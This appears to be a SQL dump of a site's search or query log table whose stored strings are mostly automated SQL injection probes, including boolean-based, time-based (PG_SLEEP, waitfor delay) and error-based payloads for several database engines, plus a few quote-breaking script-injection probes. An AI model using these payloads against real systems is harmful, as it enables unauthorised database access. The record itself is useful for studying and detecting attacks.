(5412, '-1\' OR 3*2>(0+5+720-720) or \'1ssHdNF7\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:51'),
(5414, '-1\" OR 2+557-557-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:53'),
(5416, '-1\" OR 3+557-557-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:54'),
(5418, '-1\" OR 3*2<(0+5+557-557) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:55'),
(5420, '-1\" OR 3*2>(0+5+557-557) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:56'),
(5426, '@@UWNIM', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:09:00'),
(5438, 'HCiEV6Kk', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:09:45'),
(5440, 'the%\' AND 2*3*8=6*8 AND \'lRHa\'!=\'lRHa%', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:09:47'),
(5442, '-1 OR 2+35-35-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:09:49'),
(5444, '-1 OR 3+35-35-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:09:51'),
(5446, '-1 OR 3*2<(0+5+35-35)', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:09:53'),
(5450, 'YhWLR4HB', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:10:40'),
(5452, '-1 OR 2+980-980-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:10:44'),
(5454, '-1 OR 3+980-980-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:10:50'),
(5456, '-1 OR 3*2<(0+5+980-980) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:10:52'),
(5458, '-1 OR 2+269-269-1=0+0+0+1', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:10:54'),
(5460, '-1 OR 3+269-269-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:10:58'),
(5462, '-1 OR 3*2<(0+5+269-269)', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:01'),
(5464, '-1\' OR 2+441-441-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:04'),
(5466, '-1\' OR 3+441-441-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:08'),
(5468, '3YCRkuuC', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:14'),
(5470, '-1 OR 2+578-578-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:18'),
(5472, '-1\' OR 3*2<(0+5+441-441) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:24'),
(5474, '-1\' OR 3*2>(0+5+441-441) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:31'),
(5476, '-1 OR 3+578-578-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:33'),
(5478, '-1\' OR 2+284-284-1=0+0+0+1 or \'qFEDrzj8\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:34'),
(5482, '-1 OR 3*2<(0+5+578-578) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:37'),
(5484, '-1\' OR 3+284-284-1=0+0+0+1 or \'qFEDrzj8\'=\'', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:39'),
(5488, '-1\' OR 3*2<(0+5+284-284) or \'qFEDrzj8\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:43'),
(5490, '-1 OR 2+986-986-1=0+0+0+1', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:46'),
(5492, '-1\' OR 3*2>(0+5+284-284) or \'qFEDrzj8\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:47'),
(5494, '-1 OR 3+986-986-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:50'),
(5496, '-1\" OR 2+566-566-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:52'),
(5498, '-1 OR 3*2<(0+5+986-986)', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:53'),
(5500, '-1\" OR 3+566-566-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:56'),
(5502, '-1\' OR 2+400-400-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:57'),
(5504, '-1\" OR 3*2<(0+5+566-566) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:11:58'),
(5506, '-1\' OR 3+400-400-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:01'),
(5508, '-1\' OR 3*2<(0+5+400-400) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:05'),
(5510, '-1\' OR 2+818-818-1=0+0+0+1 or \'cchg8ytJ\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:08'),
(5512, '-1\' OR 3+818-818-1=0+0+0+1 or \'cchg8ytJ\'=\'', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:14'),
(5518, '-1\' OR 3*2<(0+5+818-818) or \'cchg8ytJ\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:19'),
(5520, '-1\" OR 2+589-589-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:22'),
(5522, '-1\" OR 3+589-589-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:26'),
(5524, '-1\" OR 3*2<(0+5+589-589) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:12:28'),
(5578, 'vyfIsQxL\' OR 848=(SELECT 848 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:16:06'),
(5584, 'SdVnLLZt\') OR 956=(SELECT 956 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:16:44'),
(5590, 'WFAyyTOy\')) OR 797=(SELECT 797 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:17:37'),
(5604, '@@y63jl', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:18:37'),
(5926, 'bIJEiItU', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:29:48'),
(5928, 'the%\' AND 2*3*8=6*8 AND \'Xmx4\'!=\'Xmx4%', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:29:53'),
(5930, '-1 OR 2+92-92-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:29:55'),
(5932, '-1 OR 3+92-92-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:29:57'),
(5934, '-1 OR 3*2<(0+5+92-92)', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:29:59'),
(5948, 'PvbVBBR2\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:34:24'),
(5950, 'lFVwMVuL\' OR 573=(SELECT 573 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:35:10'),
(5952, 'TNUI09Hp\') OR 86=(SELECT 86 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:35:54'),
(5954, 'DtfbnShx\')) OR 886=(SELECT 886 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2025-03-08 12:36:37'),
(6787, 'vGvZ', 0, 5, NULL, 1, 1, 1, 0, '2025-08-21 21:35:45'),
(6791, '6843', 0, 1, NULL, 1, 1, 1, 0, '2025-08-21 21:35:35'),
(6793, 'vGvZ\')\".(((,)(', 0, 1, NULL, 1, 1, 1, 0, '2025-08-21 21:35:37'),
(6795, 'vGvZ\'VotyaL<\'\">fdaOfg', 0, 1, NULL, 1, 1, 1, 0, '2025-08-21 21:35:39'),
(7004, 'dSiI', 0, 2719, NULL, 1, 1, 1, 0, '2025-11-06 18:31:51'),
(7008, '7872', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:45:48'),
(7010, 'dSiI,\"\',(,(.()', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:45:50'),
(7012, 'dSiI\'vwyDVv<\'\">CGLyFo', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:45:52'),
(7014, 'dSiI\' AND 6381=2820-- OoUO', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:45:54'),
(7016, 'dSiI\') AND 9028=9874 AND (\'Zsuj\' LIKE \'Zsuj', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:04'),
(7018, 'dSiI\')) AND 4266=7257 AND ((\'DkzK\' LIKE \'DkzK', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:07'),
(7020, 'dSiI%\' AND 7671=8001 AND \'DABz%\'=\'DABz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:10'),
(7022, 'dSiI\' AND 4834=1347 AND \'nkBY\' LIKE \'nkBY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:13'),
(7024, 'dSiI\") AND 6827=6834 AND (\"cwiw\" LIKE \"cwiw', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:23'),
(7026, 'dSiI\" AND 5754=3421 AND \"xVyo\" LIKE \"xVyo', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:26'),
(7028, 'dSiI\' AND 3263=7386 OR \'ITWQ\'=\'WNsA', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:29'),
(7030, 'dSiI) AND 1607=5322-- HeDP', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:33'),
(7032, 'dSiI AND 8393=3071', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:42'),
(7034, 'dSiI AND 5107=4419-- mgoF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:47'),
(7036, 'dSiI AND 8698=1914# FaJO', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:46:51'),
(7038, 'dSiI\') AND 8193=5190-- pWvU', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:15'),
(7040, 'dSiI\')) AND 9850=1194-- pqiY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:20'),
(7042, 'dSiI\'))) AND 6538=3042-- iYKq', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:23'),
(7044, 'dSiI%\' AND 5159=5426-- BABZ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:26'),
(7046, 'dSiI\") AND 6873=4661-- iior', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:32'),
(7048, 'dSiI\")) AND 6037=5036-- cqCV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:35'),
(7050, 'dSiI\" AND 2050=8329-- hTvr', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:39'),
(7052, 'dSiI)) AND 6053=8835-- ovNy', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:41'),
(7054, 'dSiI))) AND 1111=8898-- fmoz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:45'),
(7056, 'dSiI\' AND 8056=2430#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:48'),
(7058, 'dSiI\') AND 1772=9236#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:53'),
(7060, 'dSiI\')) AND 1947=4069#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:47:56'),
(7062, 'dSiI\'))) AND 6238=7374#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:00'),
(7064, 'dSiI%\' AND 2040=9502#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:04'),
(7066, 'dSiI\") AND 9553=7388#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:07'),
(7068, 'dSiI\")) AND 5314=6658#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:10'),
(7070, 'dSiI\" AND 2300=9983#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:12'),
(7072, 'dSiI) AND 8956=8559#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:16'),
(7074, 'dSiI)) AND 2476=2628#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:20'),
(7076, 'dSiI))) AND 8534=5136#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:23'),
(7078, 'dSiI AND 1378=2080#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:26'),
(7080, 'dSiI\' AND 2353=9504', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:30'),
(7082, 'dSiI\') AND 3620=3473', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:33'),
(7084, 'dSiI\')) AND 3716=4244', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:38'),
(7086, 'dSiI\'))) AND 5968=2457', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:41'),
(7088, 'dSiI%\' AND 2449=6588', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:44'),
(7090, 'dSiI\") AND 6413=2313', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:47'),
(7092, 'dSiI\")) AND 7445=3212', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:50'),
(7094, 'dSiI\" AND 7345=2262', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:53'),
(7096, 'dSiI) AND 8395=8835', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:56'),
(7098, 'dSiI)) AND 2856=9895', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:48:59'),
(7100, 'dSiI))) AND 8061=8847', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:03'),
(7102, 'dSiI AND 9420=7701', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:06'),
(7104, 'dSiI\' RLIKE (SELECT (CASE WHEN (9832=3228) THEN 0x64536949 ELSE 0x28 END))-- kuQq', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:09'),
(7106, 'dSiI\') RLIKE (SELECT (CASE WHEN (6208=4952) THEN 0x64536949 ELSE 0x28 END)) AND (\'wnlE\' LIKE \'wnlE', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:21'),
(7108, 'dSiI\')) RLIKE (SELECT (CASE WHEN (3026=7249) THEN 0x64536949 ELSE 0x28 END)) AND ((\'Hajm\' LIKE \'Hajm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:25'),
(7110, 'dSiI%\' RLIKE (SELECT (CASE WHEN (7243=7012) THEN 0x64536949 ELSE 0x28 END)) AND \'TwRU%\'=\'TwRU', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:28'),
(7112, 'dSiI\' RLIKE (SELECT (CASE WHEN (4297=7519) THEN 0x64536949 ELSE 0x28 END)) AND \'mwJy\' LIKE \'mwJy', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:32'),
(7114, 'dSiI\") RLIKE (SELECT (CASE WHEN (2499=4927) THEN 0x64536949 ELSE 0x28 END)) AND (\"XwBN\" LIKE \"XwBN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:40'),
(7116, 'dSiI\" RLIKE (SELECT (CASE WHEN (5014=1347) THEN 0x64536949 ELSE 0x28 END)) AND \"ZXYl\" LIKE \"ZXYl', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:43'),
(7118, 'dSiI\' RLIKE (SELECT (CASE WHEN (9966=3475) THEN 0x64536949 ELSE 0x28 END)) OR \'RjoD\'=\'neNo', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:46'),
(7120, 'dSiI) RLIKE (SELECT (CASE WHEN (4590=7212) THEN 0x64536949 ELSE 0x28 END))-- PeLd', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:49:52'),
(7122, 'dSiI RLIKE (SELECT (CASE WHEN (4986=5490) THEN 0x64536949 ELSE 0x28 END))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:01'),
(7124, 'dSiI RLIKE (SELECT (CASE WHEN (1890=1604) THEN 0x64536949 ELSE 0x28 END))-- UNII', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:04'),
(7126, 'dSiI RLIKE (SELECT (CASE WHEN (8527=3077) THEN 0x64536949 ELSE 0x28 END))# bDae', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:07'),
(7128, 'dSiI\' AND MAKE_SET(1999=2010,2010)-- ogPk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:10'),
(7130, 'dSiI\') AND MAKE_SET(8430=2213,2213) AND (\'PAGW\' LIKE \'PAGW', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:19'),
(7132, 'dSiI\')) AND MAKE_SET(3911=7341,7341) AND ((\'aSKd\' LIKE \'aSKd', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:22'),
(7134, 'dSiI%\' AND MAKE_SET(5108=6826,6826) AND \'oNQi%\'=\'oNQi', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:28'),
(7136, 'dSiI\' AND MAKE_SET(4686=5428,5428) AND \'eHsG\' LIKE \'eHsG', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:31'),
(7138, 'dSiI\") AND MAKE_SET(6911=3596,3596) AND (\"BCGW\" LIKE \"BCGW', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:40'),
(7140, 'dSiI\" AND MAKE_SET(3611=2497,2497) AND \"mWbH\" LIKE \"mWbH', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:43'),
(7142, 'dSiI\' AND MAKE_SET(7030=5006,5006) OR \'YgtN\'=\'pwHY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:46'),
(7144, 'dSiI) AND MAKE_SET(4357=6164,6164)-- QXgZ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:49'),
(7146, 'dSiI AND MAKE_SET(6213=3475,3475)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:50:59'),
(7148, 'dSiI AND MAKE_SET(8076=7489,7489)-- ZfhY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:04'),
(7150, 'dSiI AND MAKE_SET(8897=2756,2756)# GMJh', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:08'),
(7152, 'dSiI\' AND (SELECT (CASE WHEN (1826=6288) THEN NULL ELSE CAST((CHR(87)||CHR(72)||CHR(107)||CHR(68)) AS NUMERIC) END)) IS NULL-- Z', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:11'),
(7154, 'dSiI\') AND (SELECT (CASE WHEN (9179=7229) THEN NULL ELSE CAST((CHR(113)||CHR(80)||CHR(83)||CHR(119)) AS NUMERIC) END)) IS NULL A', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:26'),
(7156, 'dSiI\')) AND (SELECT (CASE WHEN (5143=6182) THEN NULL ELSE CAST((CHR(102)||CHR(87)||CHR(119)||CHR(107)) AS NUMERIC) END)) IS NULL', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:29'),
(7158, 'dSiI%\' AND (SELECT (CASE WHEN (5983=7191) THEN NULL ELSE CAST((CHR(121)||CHR(100)||CHR(84)||CHR(70)) AS NUMERIC) END)) IS NULL A', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:33'),
(7160, 'dSiI\' AND (SELECT (CASE WHEN (5921=7558) THEN NULL ELSE CAST((CHR(102)||CHR(83)||CHR(110)||CHR(81)) AS NUMERIC) END)) IS NULL AN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:38'),
(7162, 'dSiI\") AND (SELECT (CASE WHEN (3973=6351) THEN NULL ELSE CAST((CHR(72)||CHR(99)||CHR(84)||CHR(105)) AS NUMERIC) END)) IS NULL AN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:47'),
(7164, 'dSiI\" AND (SELECT (CASE WHEN (4138=3513) THEN NULL ELSE CAST((CHR(112)||CHR(66)||CHR(85)||CHR(82)) AS NUMERIC) END)) IS NULL AND', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:50'),
(7166, 'dSiI\' AND (SELECT (CASE WHEN (2337=8724) THEN NULL ELSE CAST((CHR(86)||CHR(68)||CHR(97)||CHR(67)) AS NUMERIC) END)) IS NULL OR \'', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:53'),
(7168, 'dSiI) AND (SELECT (CASE WHEN (2582=1599) THEN NULL ELSE CAST((CHR(86)||CHR(88)||CHR(105)||CHR(77)) AS NUMERIC) END)) IS NULL-- z', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:51:58'),
(7170, 'dSiI AND (SELECT (CASE WHEN (8945=1195) THEN NULL ELSE CAST((CHR(80)||CHR(69)||CHR(67)||CHR(120)) AS NUMERIC) END)) IS NULL', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:08'),
(7172, 'dSiI AND (SELECT (CASE WHEN (3445=1759) THEN NULL ELSE CAST((CHR(106)||CHR(86)||CHR(89)||CHR(98)) AS NUMERIC) END)) IS NULL-- Kz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:12'),
(7174, 'dSiI AND (SELECT (CASE WHEN (9868=4853) THEN NULL ELSE CAST((CHR(101)||CHR(77)||CHR(120)||CHR(102)) AS NUMERIC) END)) IS NULL# Y', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:15'),
(7176, 'dSiI\' AND (SELECT (CASE WHEN (4327=4416) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4327) END) FROM DUAL) IS NULL-- NYmX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:18'),
(7178, 'dSiI\') AND (SELECT (CASE WHEN (3197=5865) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3197) END) FROM DUAL) IS NULL AND (\'uoJW\' LIKE \'uoJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:33'),
(7180, 'dSiI\')) AND (SELECT (CASE WHEN (6650=2699) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,6650) END) FROM DUAL) IS NULL AND ((\'YQHA\' LIKE \'Y', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:36'),
(7182, 'dSiI%\' AND (SELECT (CASE WHEN (4255=7063) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4255) END) FROM DUAL) IS NULL AND \'icCn%\'=\'icCn', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:39'),
(7184, 'dSiI\' AND (SELECT (CASE WHEN (7505=6615) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,7505) END) FROM DUAL) IS NULL AND \'ZTIm\' LIKE \'ZTIm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:43'),
(7186, 'dSiI\") AND (SELECT (CASE WHEN (9810=2633) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9810) END) FROM DUAL) IS NULL AND (\"kKTJ\" LIKE \"kKT', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:55'),
(7188, 'dSiI\" AND (SELECT (CASE WHEN (3374=8089) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3374) END) FROM DUAL) IS NULL AND \"NAfI\" LIKE \"NAfI', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:52:58'),
(7190, 'dSiI\' AND (SELECT (CASE WHEN (3059=7380) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3059) END) FROM DUAL) IS NULL OR \'gUWj\'=\'MRhx', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:01'),
(7192, 'dSiI) AND (SELECT (CASE WHEN (9100=4167) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9100) END) FROM DUAL) IS NULL-- rZPS', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:04'),
(7194, 'dSiI AND (SELECT (CASE WHEN (9199=4119) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9199) END) FROM DUAL) IS NULL', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:13'),
(7196, 'dSiI AND (SELECT (CASE WHEN (4884=1642) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4884) END) FROM DUAL) IS NULL-- UEjf', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:19'),
(7198, 'dSiI AND (SELECT (CASE WHEN (9962=5007) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9962) END) FROM DUAL) IS NULL# nBet', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:22'),
(7200, 'dSiI\' AND CASE WHEN 9667=9735 THEN 9667 ELSE JSON(CHAR(101,68,120,119)) END-- vaqe', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:25'),
(7202, 'dSiI\') AND CASE WHEN 5571=1361 THEN 5571 ELSE JSON(CHAR(106,116,83,67)) END AND (\'DhVG\' LIKE \'DhVG', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:40'),
(7204, 'dSiI\')) AND CASE WHEN 2688=4199 THEN 2688 ELSE JSON(CHAR(117,82,83,73)) END AND ((\'gfYj\' LIKE \'gfYj', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:43'),
(7206, 'dSiI%\' AND CASE WHEN 3931=5027 THEN 3931 ELSE JSON(CHAR(79,119,72,71)) END AND \'VkTF%\'=\'VkTF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:46'),
(7208, 'dSiI\' AND CASE WHEN 8157=3042 THEN 8157 ELSE JSON(CHAR(69,88,108,100)) END AND \'IlDB\' LIKE \'IlDB', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:53:51'),
(7210, 'dSiI\") AND CASE WHEN 5399=3234 THEN 5399 ELSE JSON(CHAR(68,67,77,118)) END AND (\"AUyF\" LIKE \"AUyF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:02'),
(7212, 'dSiI\" AND CASE WHEN 5936=5013 THEN 5936 ELSE JSON(CHAR(75,80,106,99)) END AND \"txcc\" LIKE \"txcc', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:06'),
(7214, 'dSiI\' AND CASE WHEN 7375=7303 THEN 7375 ELSE JSON(CHAR(120,88,111,69)) END OR \'vbSS\'=\'kxyu', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:10'),
(7216, 'dSiI) AND CASE WHEN 9429=4043 THEN 9429 ELSE JSON(CHAR(70,73,109,119)) END-- RObX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:13'),
(7218, 'dSiI AND CASE WHEN 8611=2309 THEN 8611 ELSE JSON(CHAR(106,88,80,110)) END', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:29'),
(7220, 'dSiI AND CASE WHEN 4263=3673 THEN 4263 ELSE JSON(CHAR(69,83,101,97)) END-- zzPp', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:31'),
(7222, 'dSiI AND CASE WHEN 8521=2023 THEN 8521 ELSE JSON(CHAR(114,88,105,111)) END# IuyV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:34'),
(7224, '(SELECT (CASE WHEN (7888=3831) THEN 7888 ELSE 1/(SELECT 0) END))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:40'),
(7226, '(SELECT (CASE WHEN (9073=8354) THEN 9073 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:46'),
(7228, '(SELECT (CASE WHEN (5752=1331) THEN 5752 ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:54'),
(7230, 'IIF(1940=9121,1940,1/0)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:54:57'),
(7232, '(CASE WHEN 2037=7091 THEN 2037 ELSE NULL END)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:03'),
(7234, '(CASE WHEN 5117=4664 THEN \'dSiI\' ELSE NULL END)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:06'),
(7236, 'dSiI\',(SELECT (CASE WHEN (9629=9029) THEN 1 ELSE 9629*(SELECT 9629 FROM INFORMATION_SCHEMA.PLUGINS) END))-- KKTX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:08'),
(7238, 'dSiI,(SELECT (CASE WHEN (2938=4761) THEN 1 ELSE 2938*(SELECT 2938 FROM INFORMATION_SCHEMA.PLUGINS) END))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 15:55:11'),
